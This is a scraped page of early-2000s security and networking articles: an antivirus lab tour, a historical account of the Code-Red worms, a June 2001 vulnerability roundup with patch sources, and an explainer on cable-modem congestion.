Once a sample is received a copy is run on a goat rig. A goat rig is a test/sacrificial machine. The phrase “goat rig” comes from the practice in the past of tethering a goat in a clearing to attract animals the hunter wanted to capture. In this case the goat rig was a powerful workstation running several virtual machines courtesy of VMware software that were in a simulated LAN. The simulation went so far as to include a simulated access point to the Internet and Internet based DNS server.

The sample is run on the goat rig for observational tests. Observational tests are the first tests conducted after the sample has been scanned for known malicious signature files. Naturally malicious activity is not often visible to the common end user, so observable activity means executing the sample and looking for files or registry keys created by the sample, new ports opened and unexpected suspicious network traffic from the test machine.

As a demonstration the lab technicians ran a sample of the mydoom virus and the observable behaviour at this point was the opening of port 3127 on the test host, unexpected network traffic from the test host and newly created registry keys. The lab technician pointed out that a firewall on the host, blocking unused ports, would have very easily prevented mydoom from spreading.

Following observational tests the sample will be submitted for reverse engineering if it's considered complex enough or it warrants further investigation.

AVERT engineers that carry out reverse engineering are located throughout the world and I found it interesting that these reverse engineers and Top AV researchers maintain contact with their peers in the other main AV vendors. This collaboration is not maintained by the AV vendors but by the AV engineers so that it is based on a trust relationship. This means that the knowledge about a sample that has been successfully identified and reverse engineered to identify payload, characteristics etc is passed to others in the AV trust group.

From the test lab we went through to the AV definition testing lab. After the detection rules and a new AV definition have been written the definition is submitted to this lab. The lab runs an automated test that applies the updated AV definition on most known Operating System platforms and against a wide reference store of known applications.

The intention is to prevent the updated AV definition from giving false positives on known safe applications.

Imagine the grief if an updated AV definition provided a false positive on Microsoft's Notepad!

One poor soul was in a corner busy surfing the web and downloading all available material to add to their reference store of applications for testing future AV definitions.

After passing the reference store test an email is sent to all subscribers of the McAfee DAT notification service and the updated AV definition is made available on the McAfee website for download.

In summary, the AVERT lab tour was an informative look behind the scenes, without much of a sales pitch, and I found the co-operation amongst AV researchers of different AV companies very interesting.

  • Hits: 39730

Code-Red Worms: A Global Threat

The first incarnation of the Code-Red worm (CRv1) began to infect hosts running unpatched versions of Microsoft's IIS webserver on July 12th, 2001. The first version of the worm uses a static seed for it's random number generator. Then, around 10:00 UTC in the morning of July 19th, 2001, a random seed variant of the Code-Red worm (CRv2) appeared and spread. This second version shared almost all of its code with the first version, but spread much more rapidly. Finally, on August 4th, a new worm began to infect machines exploiting the same vulnerability in Microsoft's IIS webserver as the original Code-Red virus. Although the new worm shared almost no code with the two versions of the original worm, it contained in its source code the string "CodeRedII" and was thus named CodeRed II. The characteristics of each worm are explained in greater detail below.

The IIS .ida Vulnerability

On June 18, 2001 eEye released information about a buffer-overflow vulnerability in Microsoft's IIS webservers.

The remotely exploitable vulnerability was discovered by Riley Hassell. It allows system-level execution of code and thus presents a serious security risk. The buffer-overflow is exploitable because the ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers.

Code-Red version 1 (CRv1)

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once-rebooted, the machine is still vulnerable to repeat infection. Any machines infected by Code-Red version 1 and subsequently rebooted were likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.

Code-Red version 2

At approximately 10:00 UTC in the morning of July 19th, 2001 a random seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. In contrast, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.

CodeRedII

On August 4, 2001, an entirely new worm, CodeRedII began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, the source code of the worm contained the string "CodeRedII" which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When a worm infects a new host, it first determines if the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate CodeRedII.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.

Although we attempted to identify the geographic location of each host as accurately
as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries. Thus, the rapidly expanding central regions of most countries is an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

About Code-Red

The first incarnation of the Code-Red worm (CRv1) began to infect hosts running unpatched versions of Microsoft's IIS webserver on July 12th, 2001. The first version of the worm uses a static seed for it's random number generator. Then, around 10:00 UTC in the morning of July 19th, 2001, a random seed variant of the Code-Red worm (CRv2) appeared and spread. This second version shared almost all of its code with the first version, but spread much more rapidly. Finally, on August 4th, a new worm began to infect machines exploiting the same vulnerability in Microsoft's IIS webserver as the original Code-Red virus. Although the new worm shared almost no code with the two versions of the original worm, it contained in its source code the string "CodeRedII" and was thus named CodeRed II. The characteristics of each worm are explained in greater detail below.

The IIS .ida Vulnerability

Detailed information about the IIS .ida vulnerability can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AD20010618.html).

On June 18, 2001 eEye released information about a buffer-overflow vulnerability in Microsoft's IIS webservers.

The remotely exploitable vulnerability was discovered by Riley Hassell. It allows system-level execution of code and thus presents a serious security risk. The buffer-overflow is exploitable because the ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers.

A security patch for this vulnerability is available from Microsoft at
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp.


Code-Red version 1 (CRv1)

Detailed information about Code-Red version 1 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html).

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once-rebooted, the machine is still vulnerable to repeat infection. Any machines infected by Code-Red version 1 and subsequently rebooted were likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.


Code-Red version 2

Detailed information about Code-Red version 2 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html) and silicon defense (http://www.silicondefense.com/cr/).

At approximately 10:00 UTC in the morning of July 19th, 2001 a random seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. In contrast, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.


CodeRedII

Detailed information about CodeRedII can be found at eEye (http://www.eeye.com/html/Research/Advisories/AL20010804.html) and http://aris.securityfocus.com/alerts/codered2/.

On August 4, 2001, an entirely new worm, CodeRedII began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, the source code of the worm contained the string "CodeRedII" which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When a worm infects a new host, it first determines if the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate CodeRedII.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.

Although we attempted to identify the geographic location of each host as accurately
as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries. Thus, the rapidly expanding central regions of most countries is an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

Quicktime animation of growth by geographic breakdown (200K .mov - requires QuickTime v3 or newer )

  • Hits: 16309

Windows Bugs Everywhere!

Vulnerabilities, bugs and exploits will keep you on your toes

Every day a new exploit, bug, or vulnerability is found and reported on the Internet, in the news and on TV. Although Microsoft seems to get the greatest number of bug reports and alerts, they are not alone. Bugs are found in all of the operating systems, whether it is server software, desktop software or imbedded systems.

Here is a list of bugs and flaws affecting Microsoft products that have been uncovered just in the month of June 2001:

  • MS Windows 2000 LDAP SSL Password Modification Vulnerability
  • MS IIS Unicode .asp Source Code Disclosure Vulnerability
  • MS Visual Studio RAD Support Buffer Overflow Vulnerability
  • MS Index Server and Indexing Service ISAPI Extension
  • Buffer Overflow Vulnerability
  • MS SQL Server Administrator Cached Connection Vulnerability
  • MS Windows 2000 Telnet Privilege Escalation Vulnerability
  • MS Windows 2000 Telnet Username DoS Vulnerability
  • MS Windows 2000 Telnet System Call DoS Vulnerability
  • MS Windows 2000 Telnet Multiple Sessions DoS Vulnerability
  • MS W2K Telnet Various Domain User Account Access Vulnerability
  • MS Windows 2000 Telnet Service DoS Vulnerability
  • MS Exchange OWA Embedded Script Execution Vulnerability
  • MS Internet Explorer File Contents Disclosure Vulnerability
  • MS Outlook Express Address Book Spoofing Vulnerability


The mere frequency and number of bugs that are being found does not bode well for Microsoft and the security of their programming methods. These are just the bugs that have been found and reported, but bugs like the Internet Explorer bug may have been around and exploited for months and hidden from discovery by the underground community.

But it isn't just Microsoft that is plagued with bugs and vulnerabilities. All flavors of Linux have their share of serious bugs also. The vulnerabilities below have also been discovered or reported for the month of June 2001:

  • Procfs Stream Redirection to Process Memory Vulnerability
  • Samba remote root vulnerability
  • Buffer overflow in fetchmail vulnerability
  • cfingerd buffer overflow vulnerability
  • man/man-db MANPATH bugs exploit
  • Oracle 8i SQLNet Header Vulnerability
  • Imap Daemon buffer overflow vulnerability
  • xinetd logging code buffer overflow vulnerability
  • Open SSH cookie file deletion vulnerability
  • Solaris libsldap Buffer Overflow Vulnerability
  • Solaris Print Protocol buffer overflow vulnerability


These are not all of the bugs and exploits that affect *nix systems, there are at least as many *nix bugs found in the month of June as there are for Microsoft products. Even the Macintosh OS, the operating system that is famous for being almost hacker proof, is also vulnerable. This is especially true with the release of OS X. This is because OS X is built on an OpenBSD Linux core. Many of the Linux/BSD specific vulnerabilities can also affect the Macintosh OS X. As an example the Macintosh OS X is subject to the SUDO buffer overflow vulnerability.

Does all of this mean that you should just throw up your hands and give up? Absolutely not! Taken as a whole the sheer number of bugs and vulnerabilities is massive and almost overwhelming. The point is that if you keep up with the latest patches and fixes, your job of keeping your OS secure is not so daunting.

Keeping up is simple if you just know where to look. Each major OS keeps a section of their Web site that is dedicated to security, fixes and patches. Here is a partial list categorized by operating system:

Windows
The Microsoft TechNet section on security contains information on the latest vulnerabilities, bugs, patches and fixes. It also has a searchable database that you can search by product and service pack.

Linux
Since there are so many different flavors of Linux I will list some of the most popular ones here.

RedHat

Alerts and Errata
RedHat lists some of the most recent vulnerabilities here as well as other security links on the RedHat site and security links that can be found elsewhere on the Web.

Slackware

Security Mailing List Archives
Although not as well organized as the Microsoft or RedHat sites, the mailing list archives contain a wealth of information. The archive is organized by year and then by month.

Apple Product Security
Even though the Mac is not as prone to security problems as other OSs, you should still take steps to secure your Mac. With the introduction of OS X, security will be more of a concern.

Keeping up is simple if you just know where to look. Each major OS keeps a section of their Web site that is dedicated to security, fixes and patches. Here is a partial list categorized by operating system:

Windows

TechNet Security Bulletins
The Microsoft TechNet section on security contains information on the latest vulnerabilities, bugs, patches and fixes. It also has a searchable database that you can search by product and service pack.

Linux

Since there are so many different flavors of Linux I will list some of the most popular ones here.

RedHat

Alerts and Errata
RedHat lists some of the most recent vulnerabilities here as well as other security links on the RedHat site and security links that can be found elsewhere on the Web.

Slackware

Security Mailing List Archives
Although not as well organized as the Microsoft or RedHat sites, the mailing list archives contain a wealth of information. The archive is organized by year and then by month.

SuSe

SuSE Linux Homepage
Included here is an index of alerts and announcements on SuSe security. There is also a link for you to subscribe to the SuSe Security Mailing list.

Solaris

Security
This is one of the most comprehensive and complete security sites of all of the OSs. If you can't find it here, you won't find it anywhere.

Macintosh

Apple Product Security
Even though the Mac is not as prone to security problems as other OSs, you should still take steps to secure your Mac. With the introduction of OS X, security will be more of a concern.
  • Hits: 14190

The Cable Modem Traffic Jam

Tie-ups that slow broadband Internet access to a crawl are a reality--but solutions are near at hand
The Cable Modem Traffic Jam

articles-connectivity-cmtj-1-1 Broadband access to the Internet by cable modem promises users lightning-fast download speeds and an always-on connection. And recent converts to broadband from dial-up technology are thrilled with complex Web screens that download before their coffee gets cold.

But, these days, earlier converts to broadband are noticing something different. They are seeing their Internet access rates slow down, instead of speed up. They are sitting in a cable modem traffic jam. In fact, today, a 56K dial-up modem can at times be faster than a cable modem and access can be more reliable.

Other broadband service providers--digital subscriber line (DSL), integrated-services digital networks (ISDNs), satellite high-speed data, and microwave high-speed data--have their own problems. In some cases, service is simply not available; in other situations, installation takes months, or the costs are wildly out of proportion. Some DSL installations work fine until a saturation point of data subscribers per bundle of twisted pairs is reached, when the crosstalk between the pairs can be a problem. 

In terms of market share, the leaders in providing broadband service are cable modems and DSL as shown below:

articles-connectivity-cmtj-2-1

But because the cable modem was the first broadband access technology to gain wide popularity, it is the first to face widespread traffic tie-ups. These tie-ups have been made visible by amusing advertisements run by competitors, describing the "bandwidth hog" moving into the neighborhood. In one advertisement, for example, a new family with teenagers is seen as a strain on the shared cable modem interconnection and is picketed. (The message is that this won't happen with DSL, although that is only a half-truth.)

So, today, the cable-modem traffic jam is all too real in many cable systems. In severe cases, even the always-on capability is lost. Still, it is not a permanent limitation of the system. It is a temporary problem with technical solutions, if the resources are available to implement the fixes. But during the period before the corrections are made, the traffic jam can be a headache.

Cable modem fundamentals

Today's traffic jam stems from the rapid acceptance of cable broadband services by consumers. A major factor in that acceptance was the 1997 standardization of modem technology that allowed consumers to own the in-home hardware and be happy that their investment would not be orphaned by a change to another cable service provider.

A cable modem system can be viewed as having several components:

articles-connectivity-cmtj-3-1

The cable modem connects to the subscriber's personal computer through the computer's Ethernet port. The purpose of this connection is to facilitate a safe hardware installation without the need for the cable technician to open the consumer's PC. If the PC does not have an Ethernet socket, commercially available hardware and software can be installed by the subscriber or by someone hired by the subscriber.

Downstream communication (from cable company headend to cable subscriber's modem) is accomplished with the same modulation systems used for cable digital television. There are two options, both using packetized data and quadrature amplitude modulation (QAM) in a 6-MHz channel, the bandwidth of an analog television channel. QAM consists of two sinusoidal carriers that are phase shifted 90 degrees with respect to each other (that is, the carriers are in quadrature with each other) and each is amplitude modulated by half of the data. The slower system uses 64 QAM with an approximate raw data rate of 30 Mb/s and a 27-Mb/s payload information rate (which is the actual usable data throughput after all error correction and system control bits are removed). The faster system uses 256 QAM with an approximate raw data rate of 43 Mb/s and a payload information rate of 39 Mb/s.

With 64 QAM, each carrier is amplitude modulated with one of eight amplitude levels. The product of the two numbers of possible amplitude levels is 64, meaning that one of 64 possible pieces of information can be transmitted at a time. Since 2^6 is 64, with 64 QAM modulation, 6 bits of data are transmitted simultaneously. Similarly, with 256 QAM, each carrier conveys one of 16 amplitude levels, and since 256 is 2^8, 8 bits of data are transmitted simultaneously. The higher speed is appropriate for newer or upgraded cable plant, while the lower speed is more tolerant of plant imperfections, such as the ingress of interfering signals and reflected signals from transmission line impedance discontinuities.

The upstream communications path (from cable modem to cable headend) resides in a narrower, more challenged spectrum. A large number of sources of interference limits the upstream communication options and speeds. Signals leak into the cable system through consumer-owned devices, through the in-home wiring, the cable drop, and the distribution cable. Fortunately, most modern cable systems connect the neighborhood to theheadend with optical fiber, which is essentially immune to interfering electromagnetic signals. A separate fiber is usually used for the upstream communications from each neighborhood. Also, the upstream bandwidth is not rigorously partitioned into 6-MHz segments.

Depending on the nature of the cable system, one or more of a dozen options for upstream communications are utilized. The upstream bandwidth and frequency are chosen by the cable operator so as to avoid strong interfering signals.

The cable modem termination system (CMTS) is an intelligent controller that manages the system operation. Managing the upstream communications is a major challenge because all of the cable modems in the subscriber's area are potentially simultaneous users of that communications path. Of course, only one cable modem can instantaneously communicate upstream on one RF channel at a time. Since the signals are packetized, the packets can be interleaved, but they must be timed to avoid collisions.

The 1997 cable modem standard included the possibility of an upstream telephone communications path for cable systems that have not implemented two-way cable. Such one-way cables have not implemented an upstream communications path from subscriber to headend. Using a dial-up modem is a practical solution since most applications involve upstream signals that are mainly keystrokes, while the downstream communications includes much more data-intensive messages that fill the screen with colorful graphics and photographs and even moving pictures and sound. The CMTS system interfaces with a billing system to ensure that an authorized subscriber is using the cable modem and that the subscriber is correctly billed.

The CMTS manages the interface to the Internet so that cable subscribers have access to more than just other cable subscribers' modems. This is accomplished with a router that links the cable system to the Internet service provider (ISP), which in turn links to the Internet. The cable company often dictates the ISP or may allow subscribers to choose from among several authorized ISPs. The largest cable ISP is @Home, which was founded in 1995 by TCI (now owned by AT&T), Cox Communications, Comcast, and others. Another ISP, Road Runner, was created by Time Warner Cable and MediaOne, which AT&T recently purchased.

Cable companies serving 80 percent of all North American households have signed exclusive service agreements with @Home or Road Runner. Two more cable ISPs--High Speed Access Corp. and ISP Channel--serve the remaining U.S. and Canadian broadband households. And other major cable companies, CableVision and Adelphia in the United States and Videotron in Canada, offer their own cable modem service.

Cable modem bottlenecks

If there were just one cable modem in operation, it could in principle have an ultimate data download capacity of 27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system. While the 256 is four times 64, the data capacity does not scale by this factor since the 8 bits simultaneously transmitted by 256 QAM are not four times the 6 bits simultaneously transmitted by 64 QAM. The 256 QAM data rates are only about 50 percent larger than the 64 QAM rates. Of course, if the cable modem is not built into a PC but is instead connected with an Ethernet link, the Ethernet connection is a bottleneck, albeit at 10 Mb/s. In any case, neither of these bottlenecks is likely to bring any complaints since downloads at these speeds would be wonderful.

A much more likely bottleneck is in the cable system's connection to the Internet or in the Internet itself or even the ultimate Web site. For example, Ellis Island recently opened its Web site to citizens to let them search for their ancestors' immigration records, and huge numbers of interested users immediately bogged down the site. No method of subscriber broadband access could help this situation since the traffic jam is at the information source. A chain is only as strong as its weakest link; if the link between the cable operator and the ISP has insufficient capacity to accommodate the traffic requested by subscribers, it will be overloaded and present a bottleneck.

This situation is not unique to a cable modem system. Any system that connects subscribers to the Internet will have to contract for capacity with an ISP or a provider of connections to the Internet backbone, and that capacity must be shared by all the service's subscribers. If too little capacity has been ordered, there will be a bottleneck. This limitation applies to digital subscriber line systems and their connections to the Internet just as it does to cable systems. If the cable operator has contracted with an ISP, the ISP's Internet connection is a potential bottleneck, because it also serves other customers. Of course, the Internet itself can be overloaded as it races to build infrastructure in step with user growth.

Recognizing that the Internet itself can slow things down, cable operators have created systems that cache popular Web sites closer to the user and that contain local sites of high interest. These sites reside on servers close to the subscriber and reduce dependence on access to the Internet. Such systems have been called walled gardens because they attempt to provide a large quantity of interesting Web pages to serve the subscriber's needs from just a local server. Keeping the subscriber within the walled garden not only reduces the demand on the Internet connection, but can also make money for the provider through the sale of local advertising and services. This technique can become overloaded as well. But curing this overload is relatively easy with the addition of more server capacity (hardware) at the cache site.

Two cable ISPs, Road Runner and @Home, were designed to minimize or avoid Internet bottlenecks. They do it by leasing virtual private networks (VPNs) to provide nationwide coverage. VPNs consist of guaranteed, dedicated capacity, which will ensure acceptable levels of nationwide data transport to local cable systems. @Home employs a national high-speed data backbone through leased capacity from AT&T. Early on, a number of problems caused traffic jams, but these are now solved.

Other potential bottlenecks are the backend systems that control billing and authorization of the subscriber's service. As cable modem subscriber numbers grow, these systems must be able to handle the load.

The capacity on the cable system is shared by all the cable modems connected to a particular channel on a particular node. Cable systems are divided into physical areas of several hundred to a few thousand subscribers, each of which is served by a node. The node converts optical signals coming from (and going to) the cable system's headend into radio frequency signals appropriate for the coaxial cable system that serves the homes in the node area:

articles-connectivity-cmtj-4-1

Only the cable modems being used at a particular time fight for sizable amounts of the capacity. Modems that are connected but idle are not a serious problem, as they use minimal capacity for routine purposes.

Clearly, success on the part of a cable company can be a source of difficulty if it sells too many cable modems to its subscribers for the installed capacity. The capacity of a given 6-MHz channel assigned to the subscribers' neighborhood and into their premises is limited to the amounts previously discussed (27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system) and the demand for service can exceed that capacity. Both upstream and downstream bandwidth limitations can hinder performance. Upstream access is required to request downloads and to upload files. Downstream access provides the desired information.

Usually, it is the downstream slowdown that is noticed. Some browsers (the software that interprets the data and paints the images on the computer screen) include so-called fuel gages or animated bar graphs that display the progress of the download. They can be satisfying when they zip along briskly, but rub salt in the wound when they crawl slowly and remind the user that time is wasting.

